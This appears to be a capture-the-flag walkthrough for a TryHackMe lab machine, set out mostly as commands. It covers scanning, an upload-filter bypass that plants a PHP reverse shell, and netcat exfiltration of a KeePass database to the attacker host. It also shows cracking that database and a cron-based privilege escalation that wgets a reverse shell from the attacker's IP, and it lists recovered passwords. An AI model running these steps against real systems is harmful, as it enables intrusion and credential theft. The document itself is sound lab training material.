Opacity
Room Link: https://tryhackme.com/room/opacity
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Found this page, I tried different extensions but it looks like it only accepts extentsions that images uses such as .jpg and .png
Initial Shell
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cp php-reverse-shell/php-reverse-shell.php .
subl php-reverse-shell.php 
Kali #1
python2 -m SimpleHTTPServer 81Kali #2
nc -lvnp 1337Browser
http://$KALI:81/php-reverse-shell.php#.jpg
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgTransfer file
In /opt we find a keepass file so I transfered back to Kali to try to crack it
Kali(receiving)
nc -l -p 1234 > dataset.kdbxVictim(sending)
nc -w 3 $KALI 1234 < dataset.kdbxCrack KeePass
Kali
/opt/john/keepass2john dataset.kdbx > johnkeepass.txt
john --wordlist=/usr/share/wordlists/rockyou.txt johnkeepass.txt 
Kali
keepassx dataset.kdbx
Password: 741852963
TCP/22 - SSH
Kali
ssh sysadmin@$VICTIM
Password: Cl0udP4ss40p4city#8700
PSPY
Kali
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81Victim
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
The script calls backup.inc.php in the lib folder, we can't edit this file but we can delete it and replace it so I copied the same php reverse shell script that was used before and replaced backup. After that I just waited until the script ran on its own.
Kali #1
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy32
python2 -m SimpleHTTPServer 81Victim
rm -f backup.inc.php
wget http://10.10.215.36:81/php-reverse-shell.php
cp php-reverse-shell.php backup.inc.phpKali #2
nc -lvnp 1337
Last updated